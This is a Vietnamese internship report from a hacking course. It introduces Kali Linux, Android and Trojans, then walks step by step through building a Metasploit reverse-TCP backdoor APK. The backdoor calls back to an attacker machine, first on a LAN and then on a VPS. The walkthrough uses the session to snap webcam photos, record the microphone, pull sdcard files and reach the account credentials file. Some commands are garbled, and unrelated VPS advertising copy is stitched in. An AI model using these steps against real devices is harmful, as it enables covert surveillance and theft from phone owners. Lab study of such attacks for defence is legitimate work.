Làm trên localhost
Giới thiệu HĐH Kali Linux
Kali Linux là một hệ điều hành dựa trên nhân Linux, chuyên dùng cho kiểm tra bảo mật và thử nghiệm xâm nhập hệ thống máy tính Được phát triển từ BackTrack, hệ điều hành này đã nhận được sự ưa chuộng từ các chuyên gia bảo mật kể từ khi ra mắt vào năm 2006 Sau 7 năm phát triển liên tục, Kali Linux đã trở thành công cụ không thể thiếu trong lĩnh vực an ninh mạng.
Năm 2013, Offensive Security đã phát hành Kali Linux, phiên bản mới của BackTrack, được coi là BackTrack 6 Kali Linux tích hợp hầu hết các công cụ thiết yếu mà mọi chuyên gia đánh giá bảo mật cần trong quá trình làm việc.
Nói vềưu điểmcủa Kali là nói về những thay đổigiữa BackTrack và Kali
So với BackTrack, Kali có rất nhiều cải tiến:
Kali Linux được phát triển dựa trên nền tảng hệ điều hành Debian, mang lại nhiều ưu điểm nổi bật Một trong những lợi thế chính là các kho lưu trữ phần mềm (repositories) của Kali được đồng bộ hóa với các kho của Debian, giúp người dùng dễ dàng nhận được các bản cập nhật và vá lỗi bảo mật mới nhất.
Trang 12 nhật Repository Duy trì cậpnhật (up-to-date) đốivới các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế nổi bật của Kali là tất cả các công cụ đều tuân theo chính sách quản lý gói của Debian Điều này không chỉ mang lại sự rõ ràng về cấu trúc hệ thống mà còn giúp người dùng dễ dàng xem xét và thay đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc
Kali Linux đã cải tiến khả năng tương thích với kiến trúc ARM, cho phép người dùng xây dựng hệ điều hành này trên các thiết bị như Raspberry Pi và Samsung Galaxy Note Sự phát triển này mở ra nhiều phiên bản ấn tượng từ khi Kali ra mắt.
Các nhà phát triển Kali đặc biệt chú trọng đến việc hỗ trợ nhiều loại phần cứng trong các thiết bị mạng không dây và USB Dongles, điều này là rất quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.
Khả năng tùy biến cao
Kali Linux cung cấp sự linh hoạt vượt trội trong việc tùy biến giao diện và hệ thống, cho phép người dùng lựa chọn từ nhiều loại desktop khác nhau như GNOME, KDE và XFCE, phù hợp với sở thích và thói quen sử dụng của từng cá nhân.
Việc nâng cấp giữa các phiên bản Kali trong tương lai trở nên dễ dàng hơn, điều này rất quan trọng đối với người dùng Kali trong việc bảo trì hệ điều hành Trái ngược với BackTrack, nơi người dùng phải cài đặt lại hoàn toàn mỗi khi có phiên bản mới, Kali cho phép nâng cấp mà không cần thực hiện lại quá trình cài đặt, ngoại trừ trường hợp nâng cấp từ phiên bản R2 lên R3 năm ngoái.
Giờđâyvới Kali, nhờ vào sựchuyểnđổi sang nềntảnghệđiều hành
Debian, Kali đãdễ dàng hơn trong việc âng cấphệthống khi phiên bảnmới xuấthiện,người dùng không phải cài lạimới hoàn toàn nữa
Cài đặt Kali Linux trên VMware
Trước tiên, hãy tải về file ISO phiên bản mới nhất của Kali Linux tại liên kết dưới đây Trong bài viết này, chúng ta sẽ thực hiện cài đặt phiên bản Kali Linux 1.0.8 64 bit [http://www.kali.org/downloads/](http://www.kali.org/downloads/)
Hình 2.1.1 Download HĐH Kali Linux
Nếu bạn đang học Công nghệ thông tin, chắc hẳn bạn đã biết đến VMware, một phần mềm tạo máy ảo hàng đầu VMware Workstation cho phép người dùng tạo máy tính ảo chạy trên nhiều hệ điều hành như Windows, Linux, Mac OS và Android Phiên bản VMware Workstation 10 nổi bật với hơn 50 tính năng mới, giúp cải thiện đáng kể trải nghiệm làm việc với các máy ảo.
Từ giao diện chính của VMware thì nhấn vào File -> New Vitual Machine (hoặc dùng phím tắt Ctrl + N).
Để bắt đầu, chọn tùy chọn Typical và nhấn Next, đây là cài đặt được VMware khuyên dùng Nếu bạn muốn tùy chỉnh các lựa chọn, hãy chọn Custom Tuy nhiên, nếu bạn không quen thuộc với các cài đặt, tốt nhất nên chọn Typical để tránh rắc rối sau này Trong trường hợp này, mình đã chọn Custom và nhấn Next.
Hình 2.1.2 New Virtual Machine Wizard (Step 1)
Tick vào Installer Disc image file Và chọn đến file ISO cần cài đặt VMware sẽ tự nhận diện đó là file iso của hệ điều hành nào.
Hình 2.1.3 New Virtual Machine Wizard (Step 2)
Trang 16 Sau đó sẽ chọn tên máy ảo và nơi lưu trữ dữ liệu của nó
Hình 2.1.4 New Virtual Machine Wizard (Step 3) Ở những bước sau thì cứ nhấn Next Đến đây thì có một tùy chọn là
Tùy chỉnh phần cứng cho phép bạn điều chỉnh các thông số như dung lượng RAM, ổ cứng và bộ điều khiển USB Việc lựa chọn dung lượng phù hợp còn phụ thuộc vào hệ điều hành mà bạn đang cài đặt VMware đã xác định dung lượng tối ưu cho nhu cầu sử dụng của mình.
Hình 2.1.5 New Virtual Machine Wizard (Step 4)
Sau khi hoàn tất các bước thiết lập, máy ảo sẽ tự động khởi động và tiến hành cài đặt Thời gian cài đặt có thể nhanh hay chậm tùy thuộc vào dung lượng, thường mất từ vài chục phút đến vài giờ Tuy nhiên, nếu sử dụng file ISO không hỗ trợ nhận diện tự động, bạn sẽ cần thực hiện từng bước cài đặt thủ công như khi cài đặt Windows thông thường, nhưng điều này cũng không quá phức tạp.
Khi khởi động Kali, bạn sẽ thấy màn hình khởi động với hai tùy chọn cài đặt: Graphical và Text-Mode Trong bài viết này, tôi sẽ lựa chọn chế độ cài đặt Graphical.
Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue
Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng
Bạn sẽ cần phải cấu hình Network và Password cho tài khoản Root
Hình 2.1.11 Set up user and password
Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.
Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu.
Kali Linux sử dụng một kho lưu trữ trung tâm để phân phối các ứng dụng, do đó, bạn cần nhập thông tin proxy khi cần thiết Lưu ý rằng nếu bạn chọn "No" trong quá trình cấu hình, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của Kali.
Hình 2.1.19 Configure the package manager
Tiếp đến là cài đặt GRUB
Hình 2.1.20 Install the GRUB boot loader on the hard disk
Cuối cùng, nhấp vào Continue để khởi động lại Kali.
Trang 28 Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.
Giao diện sau khi cài đặt xong:
Giới thiệu HĐH Android
Tổng công ty Android (Android, Inc.) được thành lập vào tháng 10 năm 2003 tại Palo Alto, California bởi Andy Rubin, Rich Miner, Nick Sears và Chris White với mục tiêu phát triển "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của người dùng" Mặc dù các nhà sáng lập có danh tiếng, công ty hoạt động âm thầm và chỉ tiết lộ rằng họ đang phát triển phần mềm cho điện thoại di động Tuy nhiên, vào năm đó, Rubin gặp khó khăn về tài chính và được bạn thân Steve Perlman hỗ trợ 10.000 USD nhưng ông từ chối tham gia vào công ty.
Vào ngày 17 tháng 8 năm 2005, Google đã mua lại Tổng công ty Android, biến nó thành một bộ phận của mình, với những nhân viên chủ chốt như Rubin, Miner và White tiếp tục làm việc tại đây Mặc dù thông tin về Tổng công ty Android lúc bấy giờ khá hạn chế, nhiều người đã dự đoán rằng Google có kế hoạch tham gia vào thị trường điện thoại di động Nhóm do Rubin dẫn dắt tại Google đã phát triển một nền tảng di động dựa trên nhân Linux và quảng bá nó đến các nhà sản xuất điện thoại cùng các nhà mạng, cam kết cung cấp một hệ thống linh hoạt và có khả năng nâng cấp Google cũng đã thiết lập mối quan hệ với nhiều hãng phần cứng và đối tác phần mềm, thể hiện sự sẵn sàng hợp tác với các nhà mạng ở nhiều cấp độ khác nhau.
Ngày càng có nhiều suy đoán về việc Google tham gia thị trường điện thoại di động vào tháng 12 năm 2006, với thông tin từ BBC và Nhật báo Phố Wall cho biết công ty đang nỗ lực tích hợp công nghệ tìm kiếm và ứng dụng của họ vào thiết bị di động Các phương tiện truyền thông, cả truyền thống lẫn trực tuyến, đã đưa tin về việc Google phát triển một thiết bị cầm tay mang thương hiệu riêng Một số tờ báo còn cho biết Google đã trình diễn mẫu sản phẩm cho các nhà sản xuất điện thoại và nhà mạng, trong khi vẫn tiếp tục hoàn thiện các bản mô tả kỹ thuật Tháng 9 năm 2007, InformationWeek công bố một nghiên cứu từ Evalueserve cho thấy Google đã nộp nhiều đơn xin cấp bằng sáng chế liên quan đến lĩnh vực điện thoại di động.
Vào ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance) được thành lập với sự tham gia của nhiều công ty lớn như Google, HTC, và Qualcomm, nhằm phát triển các tiêu chuẩn mở cho thiết bị di động Cùng ngày, nền tảng Android, được xây dựng trên nhân Linux phiên bản 2.6, cũng được ra mắt như sản phẩm đầu tiên của Liên minh Chiếc điện thoại chạy Android đầu tiên, HTC Dream, đã được phát hành vào ngày 22 tháng 10 năm 2008 Biểu tượng của hệ điều hành Android, một con rôbốt màu xanh lá cây, được thiết kế bởi Irina Blok tại California.
Kể từ năm 2008, hệ điều hành Android đã trải qua nhiều bản cập nhật, cải tiến tính năng và sửa lỗi, với mỗi phiên bản được đặt tên theo thứ tự bảng chữ cái và các món tráng miệng, như phiên bản 1.5 Cupcake và 1.6 Donut Phiên bản mới nhất là 4.4 KitKat Năm 2010, Google giới thiệu dòng sản phẩm Nexus, bao gồm điện thoại thông minh và máy tính bảng chạy Android, bắt đầu với Nexus One do HTC sản xuất Các thiết bị mới như Nexus 4 và Nexus 10 cũng đã được ra mắt, do LG và Samsung sản xuất, với Google coi đây là những thiết bị Android chủ lực, tích hợp tính năng phần cứng và phần mềm tiên tiến nhất.
1 Tính mở Android được xây dựng từdưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủcác điểm mạnh của các thiết bị cầm tay hiện có Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng Android được xây dựng trên nhân Linux mở Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động Android mà một mã nguồn mở, nó có thểđược mở rộng để kết hợp tự do giữa các công nghệ nổi trội Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo
2 Tính ngang bằng của các ứng dụng Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thểđáp ứng đầy đủ các nhu cầu mà họ thích Chúng ta có thểđổi màn hình nền, kiểu gọi điện thoại, hay bất kểứng dụng nào Chúng ta thậm chí có thểhướng dẫn điện thoại chỉ xem những ảnh mình thích
3 Phá vỡ rào cản phát triển ứng dụng Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ–để cung cấp chính xác hơn cho người khác Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họđang ở vị trí lân cận Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụđịnh vị toàn cầu GPS
4 Xây dựng ứng dụng dễ dàng và nhanh chóng Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng
Trang 32 dụng phức tạp Ví dụ, Android có thểcho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp Thêm nữa, Android còn bao gồm một bộ công cụđầy đủ giúp cho việc phát triển trở nên dễ dàng.
Giới thiệu về Trojan
Trojan là một loại virus có khả năng xâm nhập vào máy tính của bạn, cho phép hacker kiểm soát hệ thống và đánh cắp thông tin cá nhân quý giá Nó có thể gây hại nghiêm trọng, bao gồm việc xóa hoặc định dạng lại ổ cứng Trojan thường lây nhiễm qua các tệp đính kèm trong email mà bạn vô tình tải xuống hoặc thông qua các chương trình trò chơi không rõ nguồn gốc.
Hacker nội thường sử dụng virus Trojan để đánh cắp mật khẩu của các chủ thuê bao qua email dưới dạng file đính kèm Khi người dùng vô tình mở file này, Trojan sẽ tự động sao chép tất cả thông tin mật khẩu, bao gồm cả mật khẩu Internet và email Ngay khi kết nối Internet, Trojan sẽ gửi email chứa mật khẩu đánh cắp về cho hacker, và tiếp tục theo dõi mọi thay đổi mật khẩu Để lừa đảo nạn nhân, hacker thường tạo ra những bẫy tinh vi, như giả danh tổ chức uy tín để gửi email mời gọi cài đặt phần mềm giả mạo, chẳng hạn như Ghostmail Họ thậm chí có thể mạo danh chuyên gia lập trình nổi tiếng để tăng độ tin cậy của các chiêu trò lừa đảo.
Để ngăn chặn virus Chernobyl 26-4, chúng tôi giới thiệu chương trình BKAV 383 và khuyến khích quý vị dùng thử Mọi ý kiến đóng góp xin gửi về quangnt@it-hut.edu.vn Tuy nhiên, nhiều người dùng dễ dàng bị lừa và vô tình cài đặt chương trình Trojan, trở thành nạn nhân của tin tặc mà không hề hay biết.
Khi Trojan được kích hoạt trên máy tính của bạn, nó có khả năng đánh cắp mật khẩu truy cập mạng, danh sách email và cấu hình máy tính, sau đó gửi thông tin này đến địa chỉ email của hacker Nguy hiểm hơn, Trojan còn gửi địa chỉ IP của bạn, mà nhà cung cấp dịch vụ mạng (ISP) gán cho bạn khi truy cập Internet Hacker có thể lợi dụng địa chỉ IP này để thiết lập kết nối từ máy tính của hắn tới máy tính của bạn, từ đó lấy cắp hoặc xóa thông tin quan trọng.
Các thủ đoạn của Hacker
1 Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc đổi password theo họ gợi ý Hacker mail cho bạn một Attached File (tập tin exe) cho biết là file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password.
2 Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ dàng lấy mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy
3 Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại là cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường là file Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn, kích thích tò mò Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và từ đó trở đi, password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn thay password mới.
Trang 34 Ðề phòng, tìm và diệt Trojan? Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các tập tin trên mạng. Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau:
1 Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ những địa chỉ thư điện tử mà bạn không rõ Cũng vì lý do này mà tác giả của chương trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo danh gửi cho bạn chương trình diệt virus mà thực chất là Trojan
2 Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên mạng Internet với từ khóa "Detect and destroy Trojan"
3 Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan thì bạn có thể kiểm tra Registry của Window: HKEY – LOCAL – MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run
Nếu bạn phát hiện một đường dẫn đến chương trình không phải của Windows hoặc các tiện ích, hãy thoát khỏi Windows và vào chế độ DOS để xóa tập tin theo đường dẫn trong Registry Sau đó, quay lại Windows và xóa dòng đã ghi trong Registry Ngoài ra, bạn cũng nên kiểm tra các tập tin Win.ini và System.ini trong thư mục C:\Windows, đặc biệt là các mục Run hoặc Load.
Giới thiệu về Malware
Malware, hay phần mềm ác tính, là phần mềm máy tính được thiết kế nhằm thâm nhập hoặc gây hại cho hệ thống mà người dùng không hay biết.
Theo thống kê từ các hãng bảo mật toàn cầu, hiện nay, Malware chủ yếu chỉ xâm nhập và đánh cắp thông tin người dùng mà chưa có khả năng lây lan Các nghiên cứu cho thấy, Malware trên smartphone hiện hoạt động giống như phần mềm gián điệp (Trojan) hơn là một virus gây hại.
Cơ chế hoạt động của Malware
Malware này hoạt động qua hai giai đoạn:
Trong giai đoạn đầu, malware được nhúng vào ứng dụng và sẽ chiếm quyền root trên thiết bị của bạn ngay khi bạn khởi động ứng dụng lần đầu tiên.
Giai đoạn 2 của malware liên quan đến việc tự động cài đặt một ứng dụng thứ hai với quyền truy cập đặc biệt cho phép gỡ bỏ cài đặt Sau khi ứng dụng này được cài đặt, nó có khả năng gửi thông tin nhạy cảm đến một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Mục đích của việc cài đặt ứng dụng hệ thống này là ngăn chặn người dùng xem hoặc gỡ bỏ các ứng dụng không được phép.
Ở giai đoạn thứ hai, ứng dụng tự động thực hiện các tác vụ như xác nhận và check-in mà không cần khởi động, thường hoạt động từ 11h đêm đến 8h sáng hôm sau, thời điểm mà điện thoại ít được sử dụng Điều này khiến người dùng gặp khó khăn trong việc phát hiện các hành vi bất thường trên smartphone của mình.
Malware mới không chỉ dừng lại ở việc tự động cài đặt ứng dụng chứa mã độc, mà đã phát triển thành những mối đe dọa nghiêm trọng hơn Chẳng hạn, Hippo SMS có khả năng gửi tin nhắn tự động mà không cần sự cho phép của người dùng, dẫn đến việc tăng cước phí một cách đột ngột mà người dùng không hay biết Một ví dụ khác là Zitmo, loại malware này cũng cung cấp các ứng dụng độc hại với mục đích gây hại cho người dùng.
Trang 36 hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này
Hiện nay, một số loại malware có khả năng nghe lén tất cả các cuộc điện thoại, gây ra mối đe dọa nghiêm trọng đến sự riêng tư của người dùng Sự hiện diện của mã độc trên hệ điều hành Android đang thực sự đe dọa an toàn cá nhân, khiến người dùng phải cảnh giác hơn bao giờ hết.
Sinh mã độc trên Kali Linux
Sử dụng Metasploit framework trên Kali Linux để tạo payload cho phép xâm nhập và điều khiển máy Android khi tải về và mở file Nếu bạn sử dụng máy ảo Kali Linux qua VMware, hãy thiết lập phần Network đúng cách để đảm bảo kết nối hiệu quả.
Bấm vào VM -> Settings ở thanh lựa chọn của VMware
Hình 2.1.24 Setting network VMware (Step 1)
Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network
Hình 2.1.25 Setting network VMware (Step 2)
Bấm vào Edit -> Virtual Network Editor
Hình 2.1.26 Setting network VMware (Step 3)
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
Hình 2.1.27 Setting network VMware (Step 4)
To create a backdoor and gain control of an Android device, start by opening the terminal and entering the command: `msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=80 R > /root/Desktop/files.apk`.
192.168.0.104 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một
Tiếp theo, gõ lệnh msfconsole
After loading msfconsole, create a handler to process incoming data by entering the following commands: `use exploit/multi/handler`, `set payload android/meterpreter/reverse_tcp`, `set lhost 192.168.0.104` – [ensure the IP address matches the one used when creating the payload], and `set lport 8080` – [make sure the port is the same as the one used during payload creation].
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Đưa mã độc vào thiết bị Android
Vì không có máy Android thật nên mình test thử với một máy Galaxy
Nexus giả lập bằng phần mềm GennyMotion có thể được tải về sau khi đăng ký tài khoản tại https://cloud.genymotion.com/page/launchpad/download/ Sau khi tải về file apk, bạn chỉ cần cài đặt và mở ứng dụng để hiển thị giao diện như hình dưới đây, sau đó nhấp vào nút để bắt đầu sử dụng.
Trang 42Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
Để sử dụng camera, bạn có thể xem danh sách camera bằng cách nhập lệnh webcam_list Để chụp hình, hãy sử dụng lệnh webcam_snap x, trong đó x là ID của camera mà bạn đã xem trong danh sách trước đó.
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy
Ghi âm Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về máy
Xâm nhập SD card của thiết bị Android từ Kali Linux
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
Trang 46Dùng lệnh cd /sdcard/Download để vào thư mục
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Và file này sẽ được tải về thư mục /root của máy Kali
Kết luận
Kali Linux là một hệ điều hành mạnh mẽ, chuyên dụng cho các chuyên gia an ninh mạng Bài viết này đã trình bày cách sử dụng Metasploit trên Kali Linux để xâm nhập và điều khiển thiết bị, cũng như truyền dữ liệu từ máy Android về máy tính Việc nắm vững công cụ này giúp người dùng nâng cao khả năng bảo mật và kiểm tra lỗ hổng an ninh.
Sau khi thử nghiệm phương pháp tấn công, chúng ta kết luận rằng không nên tải và chạy các file lạ trên thiết bị Android Việc này giúp ngăn chặn việc cài đặt backdoor, vì chỉ cần một lần máy bị nhiễm backdoor là kẻ tấn công có thể kiểm soát hoàn toàn thiết bị Android đó.
Làm trên VPS
Giới thiệu về VPS
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo Trong khi trên một server chạy một
VPS có hiệu năng vượt trội hơn so với Share Host, vì trong khi Share Host có thể chạy hàng trăm tài khoản cùng lúc, thì VPS chỉ cho phép khoảng 1/10 số lượng đó Điều này cho thấy VPS mang lại hiệu suất cao hơn đáng kể.
Mỗi máy chủ VPS là một hệ thống độc lập với hệ điều hành riêng, cho phép người dùng quản lý quyền root và khởi động lại hệ thống tùy ý Điều này giúp VPS hoàn toàn hạn chế khả năng bị hack từ xa.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
VPS là giải pháp lý tưởng cho các doanh nghiệp vừa và các trang web lớn hoặc mã nguồn nặng, vì nó cung cấp hiệu suất vượt trội so với Shared Hosting Tuy nhiên, người dùng cần có kiến thức về bảo mật và cấu hình server để tối ưu hóa hiệu quả sử dụng VPS Các thông số kỹ thuật của VPS cũng rất quan trọng để đáp ứng nhu cầu cụ thể của từng doanh nghiệp.
Hoạt động như một máy chủ độc lập, dịch vụ này cung cấp CPU, RAM, ổ HDD, địa chỉ IP và hệ điều hành riêng biệt, đảm bảo hiệu suất và tính bảo mật cao cho người sử dụng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng
VPS không chỉ được sử dụng để thiết lập Web Server và Mail Server, mà còn có thể cài đặt để đáp ứng các nhu cầu riêng biệt như truy cập Web qua trình duyệt trên VPS và tải xuống/tải lên bittorrent với tốc độ cao.
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút
Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Cài đặt mã độc trên VPS
Metasploit là một công cụ mạnh mẽ dùng để khai thác lỗ hổng của hệ điều hành, phục vụ cho việc kiểm tra, tấn công và khai thác lỗi của các dịch vụ Được phát triển bằng ngôn ngữ Perl hướng đối tượng, Metasploit bao gồm nhiều thành phần được viết bằng C, assembler và Python Công cụ này có khả năng hoạt động trên hầu hết các hệ điều hành như Linux, Windows và Mac OS.
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu
Trang 50Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Trang 52 Chọn server và ngày hết hạn, để mặc định:
Quá trình cài đặt của Metasploit:
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào
Metasploit Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account:
Trình duyệt sẽ chuyển đến trang nhập key để kích hoạt chương trình; key này được gửi miễn phí qua email khi tải phần mềm Sau khi điền key, bạn chỉ cần nhấn vào nút Activate để hoàn tất quá trình kích hoạt.
Giao diện chương trình Metasploit Console
Từ VPS xâm nhập vào thiết bị Android
1 Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang LAN với địa chỉIP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost.0.21.132 lportD44 R > /root/Desktop/files.apk Ởđây địa chỉ VPS là 14.0.21.132
2 Khởi động Metasploit Console trên VPS
3 Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS
4 Sau khi máy nạn nhân tải vềfile apk đã được tạo ra, máy android đó sẽ bị hack
5 Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ Để xem thông tin về máy, nhập lệnh sysinfo Để xem các tác vụđang chạy gõ ps
Xem danh sách thư mục, file gõ ls
Để sử dụng camera, bạn có thể xem danh sách các camera bằng cách nhập lệnh "webcam_list" Để chụp hình, hãy nhập lệnh "webcam_snap x", trong đó x là ID của camera mà bạn đã xem trong danh sách trước đó.
Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽđược lưu về máy
Lấy file từ sd card Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls đểxem danh sách file, thư mục
Dùng lệnh cd /sdcard/Download đểvào thư mục Để tải về máy, ta nhập lệnh
Download App.apk Để upload gõ lệnh upload
Và file này sẽđược tải vềthư mục root của máy Kali
Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami
Nếu báo "unknown id" là 0, điều này có nghĩa là thiết bị đã được root Bạn có thể sử dụng lệnh "ls -l" để liệt kê các file và quyền truy cập trong thư mục Hãy sử dụng lệnh "cd" để chuyển đến thư mục mong muốn Điều này có thể tạo điều kiện cho việc ăn cắp tài khoản, mật khẩu, file APK và thay đổi các quyền truy cập.
/DATA/SYSTEM/SYNC/accounts.xml
Để xem danh sách và tải xuống các tệp trong hệ thống ứng dụng, trước tiên bạn cần gõ lệnh SU để có quyền truy cập đầy đủ Sau đó, để có đường dẫn đầy đủ, hãy sử dụng lệnh chmod -R 777 theo sau là đường dẫn đến tên tệp.
Sử dụng SQLite để mở file db
Những kiến thức lý thuyết đã được củng cố:
Tìm hiểu về lịch sử, quá trình phát triển của hệđiều hành Android
Tìm hiểu về hệđiều hành Kali Linux
Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Những kỹnăng thực hành đã được học thêm:
Thực hiện cài đặt Android trên máy ảo
Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android
Thi lấy chứng chỉ System Hacking của trung tâm Athena
Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android
Biết thêm về một số bài học trong lớp Hacker mũ trắng
Những kinh nghiệm thực tiễn đã tích lũy được:
Sau gần 2 tháng thực tập, tôi đã tích lũy được nhiều kinh nghiệm quý báu, đặc biệt là về các kỹ năng chuyên môn Tôi không chỉ học hỏi và củng cố các kiến thức mới mà còn làm quen với môi trường doanh nghiệp, giúp tôi tự tin hơn khi bước vào thị trường lao động Quá trình thực tập cũng đã cải thiện kỹ năng giao tiếp và ứng xử của tôi, chuẩn bị tốt cho sự nghiệp tương lai.